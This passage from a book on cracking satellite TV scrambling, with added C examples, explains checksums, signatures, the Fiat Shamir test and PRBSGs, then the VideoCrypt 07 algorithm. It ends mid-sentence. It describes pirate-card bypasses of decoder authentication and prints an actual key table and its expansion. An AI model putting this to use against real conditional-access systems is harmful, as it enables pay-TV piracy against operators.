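The two checks described above side by side, as an added C example (not from the book): a modulo 256 checksum and a CRC-8 are each appended to a constructed packet, the packet is verified, and then two of its bytes are swapped to show that the modulo checksum still passes while the CRC does not. The generator polynomial (x^8 + x^2 + x + 1) and the sample bytes are this example's assumptions; the book does not name the polynomial of any system.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Modulo arithmetic checksum: the byte that brings the sum of the packet to
   a multiple of 256, so a mod 256 sum over the whole packet comes to zero. */
uint8_t mod_checksum(const uint8_t *data, size_t len)
{
    uint8_t sum = 0;
    for (size_t i = 0; i < len; i++)
        sum += data[i];
    return (uint8_t)(0u - sum);
}

int mod_checksum_ok(const uint8_t *pkt, size_t len)   /* pkt includes the checksum */
{
    uint8_t sum = 0;
    for (size_t i = 0; i < len; i++)
        sum += pkt[i];
    return sum == 0;
}

/* CRC-8: the packet is treated as a polynomial over GF(2) and divided by a
   small fixed generator polynomial; the remainder is the CRC. The generator
   below is an assumed one, x^8 + x^2 + x + 1. */
#define CRC_POLY 0x07

uint8_t crc8(const uint8_t *data, size_t len)
{
    uint8_t crc = 0;
    for (size_t i = 0; i < len; i++) {
        crc ^= data[i];
        for (int b = 0; b < 8; b++)
            crc = (crc & 0x80) ? (uint8_t)((crc << 1) ^ CRC_POLY)
                               : (uint8_t)(crc << 1);
    }
    return crc;                                /* remainder of the division */
}

/* A packet with its CRC appended divides exactly, so the remainder is zero. */
int crc8_ok(const uint8_t *pkt, size_t len)
{
    return crc8(pkt, len) == 0;
}

/* Constructed sample message (not taken from any real system). */
#define MSG_LEN 8
static const uint8_t SAMPLE_MSG[MSG_LEN] = {0x07, 0x2A, 0x4C, 0x11, 0x00, 0xF3, 0x5E, 0x81};
static const uint8_t CRC_KAT[2] = {0x01, 0x02};   /* crc8 of these two bytes is 0x1B */

/* Build the packet with the chosen check value appended, optionally swap two
   message bytes (the reordering the book describes), and return whether the
   receiver's check still passes. */
static int check_packet(int use_crc, int swap)
{
    uint8_t pkt[MSG_LEN + 1];
    memcpy(pkt, SAMPLE_MSG, MSG_LEN);
    pkt[MSG_LEN] = use_crc ? crc8(pkt, MSG_LEN) : mod_checksum(pkt, MSG_LEN);
    if (swap) {
        uint8_t t = pkt[1];
        pkt[1] = pkt[2];
        pkt[2] = t;
    }
    return use_crc ? crc8_ok(pkt, MSG_LEN + 1) : mod_checksum_ok(pkt, MSG_LEN + 1);
}

int intact_passes_mod_checksum(void) { return check_packet(0, 0); }   /* 1 */
int intact_passes_crc8(void)         { return check_packet(1, 0); }   /* 1 */
int reorder_passes_mod_checksum(void) { return check_packet(0, 1); }  /* 1: not detected */
int reorder_passes_crc8(void)         { return check_packet(1, 1); }  /* 0: detected */
```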


• Signatures


While the previous methods are good enough to form the first level of
authentication, they are not ultimately secure enough. They are a lot easier to
hack than a properly constructed crypto signature.


A signature system will be, theoretically at least, more difficult to hack and 
will form the last line of defence against the hacker spoofing the decoder 
with an unauthorised packet of data. 


The commonest option in scrambling systems is to use the actual main 
algorithm as the algorithm for generating the signature. This signature is 
often referred to as the Hash Signature or Hash Checksum. The use of the 
algorithm in this manner is economical. 


There are two approaches to using signatures in scrambling systems. The 
first and most obvious is to have a separate signature that is appended to 
the packet. The second is to have a signature that is part of the message 
used to generate the seed. 


In the EuroCrypt-M system, the key generation packet has an eight byte 
checksum appended. This checksum is passed through a modified version 
of the DES four times. 


In the 07 and 09 VideoCrypt system, the signature formed part of the seed
generation data. The first 27 bytes of the packet were processed through the
hash function. Then the four bytes of the hash signature were processed
through the hash function twice. The result of each cycle should equal
the signature byte.




6: Cracking The Code 


RSA Signature 


This signature operation in RSA is relatively simple. The transmitter takes a 
message and raises it to the power of his Secret Key (S) modulo N. 


The receiver then uses the transmitters Public Key (P) to raise the 
ciphertext to the Pth power modulo N. The result is the plaintext message. 


The message could be a random piece of information or something such as 
the date or the channel number. There would be no real transfer of 
knowledge between the transmitter and the receiver. 


Transmitter: Published data= N, P 

Message = plaintext 

Encrypting: 

Ciphertext = plaintext^S Mod N

Decrypting: 

Receiver: Uses transmitter's N and P values to restore message.
Plaintext = ciphertext^P Mod N


There are of course other methods of signing data. This RSA method is 
useful where there is a lot of computing power. However for smart card 
applications, where the eight bit processor still rules, other less cycle 
consuming algorithms are required. 


Fiat Shamir Zero Knowledge Test (ZKT) 


The Fiat Shamir Zero Knowledge Test is, according to VideoCrypt 
brochures, used to verify that the packets of information in the VideoCrypt 
access control system are valid and have not been tampered with. 


Unfortunately for News Datacom and the users of VideoCrypt, there was a
flaw in the implementation of the ZKT in the decoder's card interface
microcontroller. The result of this flaw was that the decoder did not reject
the pirate smart card. Had it done so, the 07 Ho Lee Fook would not have
worked.


The original paper on the algorithm was published in the proceedings of
Crypto '86. The information outlined here is derived from a paper on an
Open Smart Card Interface for D2-MAC. The paper was published in 1991.


The Fiat Shamir algorithm relies on the difficulty of factoring and extracting 
modulo square roots. Basically the look-up table R is never sent out of the
smart card. The card serial number is, theoretically, not supposed to be sent
outside of the card.


The Fiat Shamir ZKT

Smart Card                              Decoder
R is the look-up table                  Modulus N
S is the card serial number

Generate X, V
X = R^2 mod N
V = S^2 mod N
Send X, V                  ---->        Store X, V

                           <----        Send Q (00h or FFh)
Generate Y
If Q = 00h then
    Y = R mod N
If Q = FFh then
    Y = (R*S) mod N
Send Y                     ---->        Verify Procedure
                                        If Q = 00h
                                            OK if: X = Y^2 mod N
                                        If Q = FFh
                                            OK if: Y^2 mod N = (X*V) mod N


This test is very simple and elegant. Its resilience lies in the difficulty of
factoring large numbers. The look-up table, R, is never divulged by the card.
Therefore the only approach would be to pop the smart card and extract the
table.


In the D2-MAC application outlined in the paper, the modulus, N, is a 64
Byte number. This gives effectively 2^512 - 1 numbers that can be used for
the modulus.


The modulus is of course a limiting factor on the size of the look-up table, R.
If the modulus is greater than R then the result of R mod N is zero. The fact
that R mod N is zero when the look-up table is a multiple of R could be
considered as a guideline for a number crunching attack.


What the ZKT has in its favour is that the numbers involved are very large. 
Factoring algorithms are slow and as a result the chances of the look-up 
table R being discovered are not good. 


A potential weakness would be the reduction of the size of the look-up table 
and modulus. A number of computers working in parallel may just have the 
chance of producing the look-up table as the result of a guided Brute Force 
Attack. 


The ZKT was just one of the authentication routines mentioned. In this 
application it was to be used to authenticate the smartcard before the 
smartcard could proceed to decode the channel. The D2-MAC systems 
tend to go for a different security approach. Whereas in the VideoCrypt 
system it is the algorithm that is the most valuable aspect, it is the key tables 
that are the most valuable in D2-MAC systems. 


The problem with the Fiat Shamir ZKT algorithm as used in a scrambling 
system is that it depends on the security of the decoder as much as the 
card. It is therefore vulnerable. The decoder uses the ZKT to check if the 
card is a valid card. The first bypass for this was to set the pirate card 
software to give back an answer of zeroes. Of course a more elegant 
solution exists if the decoder's card interface microcontroller is compro- 
mised. 


The card interface microcontroller is generally the one that has to check the 
ZKT response of the card. It is also the one that controls the card - decoder 
traffic. Therefore if the software in this microcontroller can be rewritten so 
that it completely ignores the ZKT packet, the ZKT will never get to the card 
with the result that the card does not have to authenticate itself to the 
decoder. 
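The card/decoder exchange from the figure above, as an added C example (not from the book or the D2-MAC paper), run with constructed toy numbers: the card commits X and V, answers the 00h and FFh challenges, and the decoder checks Y^2 against X or against X*V. The verifier also rejects the all-zero answer the text mentions, since with X = V = Y = 0 both equations hold trivially; the modulus 3713 and the values of R and S are this example's own.

```c
#include <stdint.h>

/* Constructed toy values; a real D2-MAC card uses a 64 byte modulus. */
#define TOY_N 3713ULL    /* published modulus N (47 * 79) */
#define TOY_R 1234ULL    /* card look-up table R: never leaves the card */
#define TOY_S 567ULL     /* card serial number S: never leaves the card */

struct card    { uint64_t r, s; };
struct decoder { uint64_t n, x, v; uint8_t q; };

/* Card: compute X = R^2 mod N and V = S^2 mod N and hand them to the decoder. */
void card_commit(const struct card *c, struct decoder *d)
{
    d->x = (c->r * c->r) % d->n;
    d->v = (c->s * c->s) % d->n;
}

/* Card: answer the challenge Q with Y = R mod N (Q = 00h) or Y = R*S mod N (Q = FFh). */
uint64_t card_respond(const struct card *c, uint64_t n, uint8_t q)
{
    return (q == 0xFF) ? (c->r * c->s) % n : c->r % n;
}

/* Decoder: Y^2 must equal X (Q = 00h) or X*V (Q = FFh), because
   (R*S)^2 = R^2 * S^2 = X * V (mod N). The first test rejects the degenerate
   all-zero answer, which would otherwise satisfy both equations. */
int decoder_verify(const struct decoder *d, uint64_t y)
{
    if (y == 0 || d->x == 0 || d->v == 0)
        return 0;
    uint64_t y2 = (y * y) % d->n;
    if (d->q == 0x00) return y2 == d->x;
    if (d->q == 0xFF) return y2 == (d->x * d->v) % d->n;
    return 0;                                   /* unknown challenge value */
}

/* One complete round of the exchange shown in the figure. */
int zkt_round(const struct card *c, uint8_t q)
{
    struct decoder d = { TOY_N, 0, 0, q };
    card_commit(c, &d);                         /* Send X, V */
    uint64_t y = card_respond(c, d.n, d.q);     /* Send Q ... Send Y */
    return decoder_verify(&d, y);
}

int genuine_card_passes(uint8_t q)
{
    struct card c = { TOY_R, TOY_S };
    return zkt_round(&c, q);                    /* 1 for both 00h and FFh */
}

uint64_t genuine_response(uint8_t q)
{
    struct card c = { TOY_R, TOY_S };
    return card_respond(&c, TOY_N, q);          /* 1234 for 00h, 1634 for FFh */
}

int zero_card_rejected(uint8_t q)
{
    struct card c = { 0, 0 };                   /* answers everything with zeroes */
    return zkt_round(&c, q) == 0;
}

/* Knowing the genuine X and V is not enough: a Y not derived from R fails. */
int wrong_answer_rejected(void)
{
    struct card genuine = { TOY_R, TOY_S };
    struct decoder d = { TOY_N, 0, 0, 0xFF };
    card_commit(&genuine, &d);
    uint64_t guess = (genuine_response(0xFF) + 1) % TOY_N;
    return decoder_verify(&d, guess) == 0;
}
```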


Of course there are ways around this hack for the systems designers. They 
could build the ZKT into the seed generation data. This way the ZKT data 
would have a second function. It would also mean that the packet containing 
the ZKT would be necessary for the card. Otherwise the card would have no
data with which to generate the seed. 


• Hash Functions and Message Digests


A Hash function produces a fixed length output from a block of data. The 
length of the input can be fixed or variable. The hash output is commonly 
referred to as the hash value. Essentially the hash function produces what 
could be called a fingerprint of a block of data. When the function is hard to 
reverse, it can be referred to as a Message Digest. 


Reversing the hash should be extremely difficult. It should not be possible to 
rebuild the input data from the output. Another factor is that in an application 
such as smart card usage, the actual algorithm used for the hash should not 
be known. 


The reason for this is that if a single algorithm is used the system can be 
compromised if the algorithm is discovered. The hash is commonly used to 
prove that the addressing data and subscriber data is valid and has not 
been altered. 


One Way Functions 


A One Way Function is like a religious deity. It depends on faith for its 
existence. Without faith it is nothing. It does not exist. Of course like every 
religious deity, One Way Functions have their true believers and disbeliev- 
ers. 


Technically speaking, a One Way Function is a function that is extremely 
difficult, if not impossible, to reverse. The procedure can only go one way 
hence the name. 


The problem with the One Way Function is that the concept is fundamen- 
tally flawed. It rules out any future discovery or theory. It is too reminiscent 
of that Holy Grail, the unbreakable cipher. Normally when someone invents 
what they believe to be an unbreakable cipher, someone else is around to 
crack it. 


History is full of such cracked unbreakable ciphers. World War Two was a 
war where many key events and battles were decided by the intelligence 
gathered from codebreaking. Indeed there are indications that the attack on 
Pearl Harbour was expected as the Japanese diplomatic ciphers were 
being cracked by the Americans and the English. 
The One Way Function has to be very difficult if not impossible to reverse.
There are a number of methods that can be used to achieve this level of 
complexity. 


The first method is to design very complex algorithm or equation. This 
approach is fine if there is a lot of processing power in the electronics. This 
method may be more suited to personal computers or similar applications. 


The second method is to use a simple routine a number of times. The 
routine would be relatively short but the fact that it is repeated so many 
times would make the reversal extremely difficult. In terms of implementa- 
tion in a smart card this is the easiest. It is merely a question of setting a 
loop. 


The simplicity and elegance of the second method makes it ideal for 
implementation in a smart card. The majority of smart cards are still using 
eight bit processors. They also run at relatively slow clock speeds. 


The routine at the core of the One Way Function is perhaps the weakest 
link. If this routine is not properly designed then the number of times that it is 
used may be irrelevant. There could be a way of cracking it by comparison. 


Theoretically, the bits in the output of the One Way Function should have no 
visible relationship with each other. This of course would be the theoretical 
model. In the real world sacrifices to the demons of expediency have to be 
made. The processor word length is one of these sacrifices. 


With eight bit processors, it is possible to have sixteen bit wide registers so 
the output of the routine could be sixteen bits wide. With the limited RAM 
available on the smart card, this would be a rather inelegant implementation 
in terms of memory usage. Using an eight bit output each time would be far 
more elegant and a lot easier to implement. 


In the second method, the routine would be applied a number of times. A 
typical procedure would be to EXOR the output of the routine with the 
contents of the output block which in the smart card model would be a 
single byte. 


The output block is effectively the accumulation of all of the previous 
outputs of the routine. The initial state of the output block is zero. In 
mathematical terms it would be the modulo 2 sum of all of the routine's 
outputs. 


Unfortunately this model is rather simplistic and is also very vulnerable. The 
same keys are applied on a repeating basis. This makes the whole chain 
relatively linear. 
The keys K0 to Kn are selected on a repeating basis. Therefore there is a risk
of a pattern developing. The keys would effectively become constants. It 
should be remembered that any potential cryptanalyst will have a large 
amount of ciphertext and its corresponding plaintext. 


It is therefore a good thing to include as many elements of non-linearity as 
possible in the model. The first step would be to make the selection of the 
keys non-linear. 


Since the application is smart card based, the memory available for key 
tables will be limited. By using a look-up routine to select the keys, a virtual 
key table many time the size of the original can be created. This look-up 
routine would make the process of cracking a lot harder. 


A good example of this type of thinking can be seen in the DES algorithm's 
key generation routine. The DES algorithm generates sixteen forty-eight bit 
keys from a single fifty-six bit key. This provides each round of the DES with 
its own key. 


Even when the model is updated, the process is still relatively linear. This
chain is repeated for each block of the output. The function f still uses the
inputs from the key table and a known variable, the input data. Since the
input data is a known factor, it could be used as a path of attack by any
cryptanalyst.


In terms of computer programming the model is very messy. The chain is 
repeated for every output block. In a situation that requires a multiple block 
output, for example one eight bytes wide, using a chain for each output 
block would be wasting processor time. It would also make each output 
block unique thus multiplying by eight the amount of information available to 
a cryptanalyst. If the complete number of output blocks formed one single 
output then things would be a lot more complicated. 


Again, the DES algorithm can be used for ideas. In the encryption and
decryption rounds, part of the previous round's output is used as the input
for the next round. A cipher that uses this procedure is called a Feistel
Cipher. It is an elegant method that increases the complexity of cracking the
algorithm. The output of each round is effectively a product of the outputs of
all the previous rounds.


By feeding each output block into the function f to generate the next output 
block would change the program from a simple EXOR equation to a 
non-linear one. 


Many of these ideas about One Way Functions can be seen in the 
VideoCrypt 07 Ho Lee Fook algorithm. 
PRNGs and PRBSGs


A random number is a number selected at random from a possible set of 
numbers. There is apparently no chance of anybody predicting the next 
number that will be selected. That kind of thing is fine for Lottery tickets and 
such. In signal security, there is a demand for two or more random number 
generators to work in synch. This is impossible as they would not be 
generating random numbers. The compromise is a Pseudo Random 
Number Generator. 


A Pseudo Random Number Generator generates a sequence of numbers 
that appears to be chosen at random. In reality, it generates a sequence of 
numbers using a mathematical equation. A PRNG relates to a number with 
a specific maximum number of digits. This would mean that the output of 
the PRNG would be EXORed with the data on a parallel basis. While it is 
possible to fabricate PRNGS, it is easier to fabricate a PRBSG. 


In security applications, a Pseudo Random Binary Sequence Generator is 
used instead of a PRNG. The PRBSG generates a one bit wide output. This 
can be EXORed bitwise with the datastream. 


In terms of hardware, a PRBSG is easily implemented using some shift 
registers and an EXOR gate. At start up, the shift registers are filled with a 
key or seed value. The system clock then shifts the bits through the 
registers. The inputs to the EXOR gate are called the feedback points. 


The datastream produced by EXORing the output of the PRBSG with the 
data would then be harder to hack. Since the bit can only be one or zero and 
each bit in the new data stream can be one or zero, the prospective hacker 
would have to acquire a lot of the ciphertext and a lot of plaintext. Using 
some complicated statistical analysis and matrix algebra, the properties of 
the PRBSG may be deduced. These properties would be the length of the 
shift register and the feedback points of the PRBSG. He would still have to 
acquire the seed word. This is the data loaded into the shift registers when 
the PRBSG is initialised. This all assumes that the feedback logic is linear. If 
it is non-linear, then the task will be extremely difficult. 


PRBSGs are commonly used in digital audio applications to shape the
spectrum of the signal. The use of the PRBSG allows the datastream to
appear as random 1s and 0s otherwise known as noise.


While a purely mathematical approach to hacking a system by cracking the 
PRBSG is possible it is a case of failing to see the greater picture. As 
cracking the sequence will take time, the video or audio has to be delayed 
for that time. This is often not an economically viable hack. 
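The shift-register PRBSG described above and the deduction of its length and feedback points from known keystream, as an added C example (not from the book). An 8 stage register with feedback points 8, 6, 5, 4 (a maximal length tap set, whichever end the stages are numbered from) is clocked to produce keystream, the keystream is EXORed with data, and the Berlekamp-Massey algorithm recovers the register length and feedback from 2 x 8 known keystream bits, which is the linear case the text says is solvable; the seed byte 0xB7 and the function names are this example's assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define REG_LEN 8
static const int TAPS[] = {8, 6, 5, 4};   /* feedback points (EXOR gate inputs) */
#define NTAPS 4

/* One clock of the shift register. Bit k of the state is the bit that entered
   k clocks after the oldest one, so bit 0 is the output and feedback point t
   reads bit REG_LEN - t. The new bit enters at the top. */
uint8_t prbsg_clock(uint8_t *state)
{
    uint8_t out = *state & 1;
    uint8_t fb = 0;
    for (int i = 0; i < NTAPS; i++)
        fb ^= (*state >> (REG_LEN - TAPS[i])) & 1;
    *state = (uint8_t)((*state >> 1) | (fb << (REG_LEN - 1)));
    return out;
}

/* Clocks until the register returns to its seed: 255 for a maximal LFSR. */
unsigned prbsg_period(uint8_t seed)
{
    uint8_t st = seed;
    unsigned n = 0;
    do { prbsg_clock(&st); n++; } while (st != seed && n < 1000);
    return n;
}

void prbsg_bits(uint8_t seed, uint8_t *bits, int n)
{
    uint8_t st = seed;
    for (int i = 0; i < n; i++)
        bits[i] = prbsg_clock(&st);
}

/* Scramble (or descramble, it is the same operation) by EXORing the bit
   stream with the PRBSG output, most significant bit of each byte first. */
void prbsg_scramble(uint8_t seed, uint8_t *buf, size_t len)
{
    uint8_t st = seed;
    for (size_t i = 0; i < len; i++)
        for (int b = 7; b >= 0; b--)
            buf[i] ^= (uint8_t)(prbsg_clock(&st) << b);
}

/* Berlekamp-Massey over GF(2): from n keystream bits returns the shortest
   register length L and fills c[0..L] (c[0] = 1) with the connection polynomial,
   so that s[j] = EXOR over i = 1..L of c[i] & s[j-i]. 2L bits suffice. */
#define MAXN 64
int berlekamp_massey(const uint8_t *s, int n, uint8_t *c)
{
    uint8_t b[MAXN], t[MAXN];
    memset(c, 0, MAXN);
    memset(b, 0, MAXN);
    c[0] = b[0] = 1;
    int L = 0, m = -1;
    for (int N = 0; N < n; N++) {
        int d = s[N];                                   /* discrepancy */
        for (int i = 1; i <= L; i++)
            d ^= c[i] & s[N - i];
        if (!d)
            continue;
        memcpy(t, c, MAXN);
        for (int i = 0; i + (N - m) < MAXN; i++)
            c[i + (N - m)] ^= b[i];
        if (2 * L <= N) { L = N + 1 - L; m = N; memcpy(b, t, MAXN); }
    }
    return L;
}

uint8_t predict_bit(const uint8_t *s, int j, const uint8_t *c, int L)
{
    uint8_t v = 0;
    for (int i = 1; i <= L; i++)
        v ^= c[i] & s[j - i];
    return v;
}

/* Recover the register from the first 16 keystream bits, then check that it
   predicts the following 24 bits. Returns the recovered length (8) or -1. */
int recover_demo(void)
{
    uint8_t bits[40], c[MAXN];
    prbsg_bits(0xB7, bits, 40);                /* constructed seed */
    int L = berlekamp_massey(bits, 2 * REG_LEN, c);
    for (int j = 2 * REG_LEN; j < 40; j++)
        if (predict_bit(bits, j, c, L) != bits[j])
            return -1;
    return L;
}

int scramble_roundtrip_ok(void)
{
    uint8_t data[4] = {0x48, 0x61, 0x63, 0x6B};   /* constructed sample bytes */
    uint8_t copy[4];
    memcpy(copy, data, 4);
    prbsg_scramble(0xB7, copy, 4);
    int changed = memcmp(copy, data, 4) != 0;
    prbsg_scramble(0xB7, copy, 4);
    return changed && memcmp(copy, data, 4) == 0;
}
```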
The 07 Ho Lee Fook Algorithm


Very few people know exactly when the 07 VideoCrypt smart card was 
hacked. The true story may never be disclosed and it probably would make 
a very good movie. There are many rumours and claims. Some claim it was 
all the work of one hacker. Others claim that the smart card itself was 
reversed. Either way the hack happened and the credibility of Sky and News 
Datacom was irretrievably shattered. 


When that aura of mystique is dispersed, the VideoCrypt system is at once 
simple and complex. It is simple in that the 07 implementation dangerously 
relied on a single layer of authentication. It is complex in that there are a lot 
of unused aspects. One Irish hacker summed it up in the following manner: 
"if it was any holier it'd be canonized. There are still too many unexplored 
avenues.” 


The algorithm that hacked the VideoCrypt system is embarrassingly simple 
in construction. At the heart is a core function. This algorithm takes the 
message block of thirty two bytes and transforms it into an eight byte 
decryption key. Though the core function is simple, the fact that it is 
repeated 99 times makes the procedure of mapping an eight byte 
decryption key back to the original thirty two byte message packet extremely 
difficult. 


This algorithm is more of a message digest than a true encryption system. It 
produces a digest of the thirty two byte packet. The packet contains the 
channel identification, time stamping and checksumming. In some respects 
this is an elegant solution to the problem of over the air addressing but in 
others it made the system totally vulnerable. 


The result of using a single packet for authentication, addressing, check- 
summing and key generation, means that the system only has one layer of 
authentication. Hack that and the system is wide open. As a direct result of 
this, the options to recover from a hack are drastically reduced. Though 
apparently the Fiat Shamir Zero Knowledge Test may be implemented in 
the 8052, it was not possible to use it. There was a bug in the majority of the 
first generation VideoCrypt decoders. This bug meant that the results of the 
Fiat Shamir ZKT would be ignored by the decoder. Otherwise things would 
have been very different. 


The fact that the decryption process can take place without a second layer 
of authentication points to a fundamental flaw in the design of VideoCrypt's 
access control. To put it simply: this hack should not have been possible 
with all of the claims that News Datacom made about their system. 
The 07 HLF algorithm transforms a thirty two byte message packet, m(0 to
31), into an eight byte decryption key, r(0 to 7). It is effectively a message
digest. The core function, f, is non-linear in that it is difficult to reverse the 
function. If it was linear then it would be trivial to reverse. When there is an 
attempt to reverse the function, the result is not a unique result but rather a 
number of results. 


Sky are now using their issue 10 card and this algorithm does not work on
the Sky channels any more. However this algorithm is still in use with the
VideoCrypt-II variant as used in mainland Europe and it is also still used on
the Adult Channel, Eurotica and JSTV. Of course these channels do use
different keytables.


The examination of the 07 algorithm is in four stages. The first deals with
the key selection and the compression of keys for use in limited memory
microcontrollers such as the PIC16C54 and PIC16C84.


The second stage examines the core function. This is the function at the 
heart of the 07 HLF algorithm. Essentially this is the main non-linear 
function in the algorithm. Trying to reverse the function produces a number 
of potential inputs that would provide the same result. 


The third stage examines the algorithm in operation. The function is actually 
used ninety nine times. This makes the whole process exceedingly difficult 
to reverse. 


1: Key Tables And Structures 


In the 07 HLF algorithm, the keytable is 256 bytes long. This is rather large 
when considered for use in PIC processors. As the memory in these 
microcontrollers is limited, the keytable has to be compressed. 


As it turns out, 256 is a very convenient number. It can be represented by 
two 16 byte arrays since 16 * 16 = 256. 


So therefore by adding an entry from each array, it is possible to regenerate 
a complete 256 entry array. In this situation, addition is used. Multiplication 
or subtraction or any other function could possibly be used. 


In the PIC implementation of the HLF algorithm, the key table is only 56 
bytes in length. This means that more than one 256 entry key table is stored 
in this 56 byte block. 
HLF Key Table In Decimal                    HLF Key Table In Hexadecimal
101 231 113 026 180 136 215 118             65 E7 71 1A B4 88 D7 76
040 208 076 110 134 140 200 067             28 D0 4C 6E 86 8C C8 43
169 236 096 066 005 242 061 028             A9 EC 60 42 05 F2 3D 1C
108 188 175 195 043 181 220 144             6C BC AF C3 2B B5 DC 90
249 005 234 081 070 157 226 096             F9 05 EA 51 46 9D E2 60
112 082 103 038 097 073 066 009             70 52 67 26 61 49 42 09
080 153 144 162 054 014 253 057             50 99 90 A2 36 0E FD 39


Using the first thirty two bytes of the fifty six byte table, it is possible to 
generate the key values shown below. 

In Hexadecimal Format:

Key.Col = {65,E7,71,1A,B4,88,D7,76,28,D0,4C,6E,86,8C,C8,43}
Key.Row = {A9,EC,60,42,05,F2,3D,1C,6C,BC,AF,C3,2B,B5,DC,90}

Key Matrix (Row x Column):

0F 91 1B C3 5E 32 81 20 D1 7A F5 18 30 36 72 EC
52 D4 5E 07 A1 75 C4 63 15 BD 39 5B 73 79 B5 30
C5 48 D1 7A 15 E8 38 D6 88 31 AC CE E6 EC 29 A3
A7 2A B3 5C F6 CA 1A B8 6A 13 8E B0 C8 CE 0B 85
6A EC 76 1F B9 8D DC 7B 2D D5 51 73 8B 91 CD 48
58 DA 64 0D A7 7B CA 69 1B C3 3F 61 79 7F BB 36
A2 25 AE 57 F1 C5 15 B3 65 0E 89 AB C3 C9 06 80
81 04 8D 36 D0 A4 F3 92 44 EC 68 8A A2 A8 E4 5F
D1 54 DD 86 21 F4 44 E2 94 3D B8 DA F2 F8 35 AF
22 A4 2E D6 71 45 94 33 E4 8D 09 2B 43 49 85 FF
15 97 21 C9 64 38 87 26 D7 80 FB 1E 36 3C 78 F2
29 AB 35 DD 78 4C 9B 3A EB 94 10 32 4A 50 8C 07
90 13 9C 45 DF B3 03 A1 53 FB 77 99 B1 B7 F3 6E
1B 9D 27 CF 6A 3E 8D 2C DD 86 02 24 3C 42 7E F8
42 C4 4E F6 91 65 B4 53 05 AD 29 4B 63 69 A5 20
F5 78 02 AA 45 19 68 07 B8 61 DC FE 17 1D 59 D3

This 256 entry key table could be stored in a single array where
microcontroller memory is not a problem. As a number of key tables are
stored in the 56 byte block, a separate 256 byte key table would have to be
stored for each entry. This is not a good method as a simple offset, as used
in the algorithm, would effectively create a new key table and a lot of hassle.


Addressing this matrix is straightforward. Since the Row and Column values
are the values in the two sixteen byte arrays, they can each be defined in
terms of a nybble or half of a byte.


As was stated earlier, the 56 byte block can be used to generate a number 
of key tables. In the 07 it was used to generate three tables. In the example 
above, the first four rows were used to provide the two 16 byte arrays. By 
using an offset of 8 and an offset of 24, the two other new 256 entry key 
tables can be generated. 


Offset = 8 

Key.Col = {28,D0,4C,6E,86,8C,C8,43,A9,EC,60,42,05,F2,3D,1C}
Key.Row = {6C,BC,AF,C3,2B,B5,DC,90,F9,05,EA,51,46,9D,E2,60}
Offset = 24 

Key.Col = {6C,BC,AF,C3,2B,B5,DC,90,F9,05,EA,51,46,9D,E2,60}
Key.Row = {70,52,67,26,61,49,42,09,50,99,90,A2,36,0E,FD,39}


By using three offsets of 0, 8 and 24 respectively, the 56 byte table can be 
used to generate the three key tables. In their full expanded format, these 
tables would occupy 768 bytes. Some claimed that the 07 card contained 
the algorithms for the 06, 07 and 08 issue. It is unlikely that the 08 codes 
were included in the 07 card. In reality, the 07 card would have contained 
the 06 and 07 key tables and perhaps some more algorithms. The 08 card 
was just a modified 07 with some new key tables. This of course had to be 
dropped in favour of issue 09 after the catastrophic hack on the 07. It forced 
News Datacom to integrate some very clever tricks in the 09. 


It would appear that the method of addressing the key tables is similar to 
that used in the S-Box routines in the DES. However the S-Box routines are 
designed to be very tough. It is not known if the key tables are as tough or 
indeed as non-linear. 


Of course the standard fixed offset is a very conventional method of key 
generation. The system could be made more secure by using a pseudo- 
random offset for each packet. The 07 algorithm was a very basic 
implementation compared to the 09. 
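Expanding the 56 byte table above into the three 256 entry key matrices at offsets 0, 8 and 24, as an added C example (not the book's or any card's code). Checking the printed matrix against Key.Row and Key.Col shows that it is reproduced exactly only when the carry out of the 8 bit addition is added back into the result (end-around carry, for instance A9 + 65 = 10E gives 0F); that is the rule used here, and it equals a plain 8 bit add whenever the sum does not overflow. The function names and the nybble lookup helper are this example's own.

```c
#include <stdint.h>
#include <stddef.h>

/* The 56 byte HLF key table exactly as printed in the book's hexadecimal column. */
static const uint8_t KEYTABLE[56] = {
    0x65, 0xE7, 0x71, 0x1A, 0xB4, 0x88, 0xD7, 0x76,
    0x28, 0xD0, 0x4C, 0x6E, 0x86, 0x8C, 0xC8, 0x43,
    0xA9, 0xEC, 0x60, 0x42, 0x05, 0xF2, 0x3D, 0x1C,
    0x6C, 0xBC, 0xAF, 0xC3, 0x2B, 0xB5, 0xDC, 0x90,
    0xF9, 0x05, 0xEA, 0x51, 0x46, 0x9D, 0xE2, 0x60,
    0x70, 0x52, 0x67, 0x26, 0x61, 0x49, 0x42, 0x09,
    0x50, 0x99, 0x90, 0xA2, 0x36, 0x0E, 0xFD, 0x39
};

static const size_t OFFSETS[3] = {0, 8, 24};   /* the three tables the 07 used */

/* 8 bit addition with the carry folded back in (end-around carry). This is
   the rule that reproduces the printed 16 x 16 matrix; 0xFF + 0x00 stays 0xFF
   and 0x90 + 0x71 = 0x101 becomes 0x02. */
uint8_t add_eac(uint8_t a, uint8_t b)
{
    unsigned s = (unsigned)a + b;
    return (uint8_t)((s & 0xFF) + (s >> 8));
}

/* Expand one 256 entry matrix from the 56 byte block at the given offset:
   Key.Col = key[offset .. offset+15], Key.Row = key[offset+16 .. offset+31],
   matrix[row][col] = Row[row] (+) Col[col]. Valid offsets are 0, 8 and 24. */
void expand_keytable(const uint8_t *key56, size_t offset, uint8_t matrix[16][16])
{
    const uint8_t *col = key56 + offset;
    const uint8_t *row = key56 + offset + 16;
    for (int r = 0; r < 16; r++)
        for (int c = 0; c < 16; c++)
            matrix[r][c] = add_eac(row[r], col[c]);
}

/* All three tables in their full expanded format: 3 * 256 = 768 bytes. */
void expand_all_keytables(const uint8_t *key56, uint8_t out[3][16][16])
{
    for (int t = 0; t < 3; t++)
        expand_keytable(key56, OFFSETS[t], out[t]);
}

/* Look up an entry without expanding anything, the way a PIC with 56 bytes of
   table would: the high nybble of the pointer byte selects the column entry
   and the low nybble the row entry, matching the k1/k2 indexing of the core
   function. */
uint8_t key_lookup(const uint8_t *key56, size_t offset, uint8_t kpoint)
{
    uint8_t k1 = key56[offset + (kpoint >> 4)];          /* column entry */
    uint8_t k2 = key56[offset + 16 + (kpoint & 0x0F)];   /* row entry */
    return add_eac(k1, k2);
}

/* Convenience accessor used by the checks below. */
uint8_t keytable_entry(size_t offset, int row, int col)
{
    uint8_t m[16][16];
    expand_keytable(KEYTABLE, offset, m);
    return m[row][col];
}
```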
2: The 07 Core Function, f


The 07 HLF algorithm produces an eight byte output from a thirty two byte 
input. There are eight byte wide registers r[0..7]. At any one time the 
function is working with two registers. 


The core function, f, operates in a byte wide manner. Each register is only 
